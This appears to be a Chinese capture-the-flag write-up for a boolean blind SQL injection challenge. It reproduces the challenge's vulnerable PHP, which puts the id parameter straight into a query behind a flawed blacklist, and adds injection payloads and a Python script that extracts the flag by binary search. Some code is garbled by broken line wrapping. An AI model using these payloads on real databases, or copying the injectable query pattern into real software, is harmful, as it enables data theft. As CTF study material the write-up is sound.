知识点:题目已经告知列名和表明为flag,接下来利用ascii和substr函数即可进行bool盲注
eg:
id=(ascii(substr((select(flag)from(flag)),1,1))<128)
0x01
看了网上的源码发现:
<?php
$dbuser='root';
$dbpass='root';
function safe($sql){
#被过滤的内容 函数基本没过滤
$blackList = array(' ','||','#','-',';','&','+','or','and','`','"','insert','group','limit','update','delete','*','into','union','load_file','outfile','./');
foreach($blackList as $blackitem){
if(stripos($sql,$blackitem)){
return False; } } return True;
} i
f(isset($_POST['id'])){
$id = $_POST['id'];
}else
{ die();
}
$db = mysql_connect("localhost",$dbuser,$dbpass); i
f(!$db){
die(mysql_error()); }
mysql_select_db("ctf",$db);
if(safe($id)){
$query = mysql_query("SELECT content from passage WHERE id = ${id} limit 0,1");
if($query){
$result = mysql_fetch_array($query);
if($result){
echo $result['content'];
}else{
echo "Error Occured When Fetch Result.";
}
}else{
var_dump($query);
} }else{
die("SQL Injection Checked."); }过滤了一堆东西,可以看到很多函数没有过滤,
接下来就想办法借助函数构造注入就可以了。
借助substr函数截取flag中的内容,长度依次增加。用if函数判断截取出来的内容是什么,这里需要穷举。如果判断成功,返回1,否则返回2。
0x2解题
贴上wp脚本
import requests i
mport time #url是随时更新的,具体的以做题时候的为准
url = 'http://40c9be7a-36f0-4e80-94ca-d1ac9e121947.node1.buuoj.cn/index.php'
data = {"id":""} f
lag = 'flag{'
i = 6
while True:
从可打印字符开始
begin = 32 end = 126 tmp = (begin+end)//2 while begin<end: print(begin,tmp,end) time.sleep(1) data["id"] = "if(ascii(substr((select flag from flag),{},1))>{},1,2)".format(i,tmp) r = requests.post(url,data=data) if 'Hello' in r.text: begin = tmp+1 tmp = (begin+end)//2 else: end = tmp tmp = (begin+end)//2 flag+=chr(tmp) print(flag) i+=1 if flag[-1]=='}': break
参考链接
https://www.cnblogs.com/kevinbruce656/p/11342580.html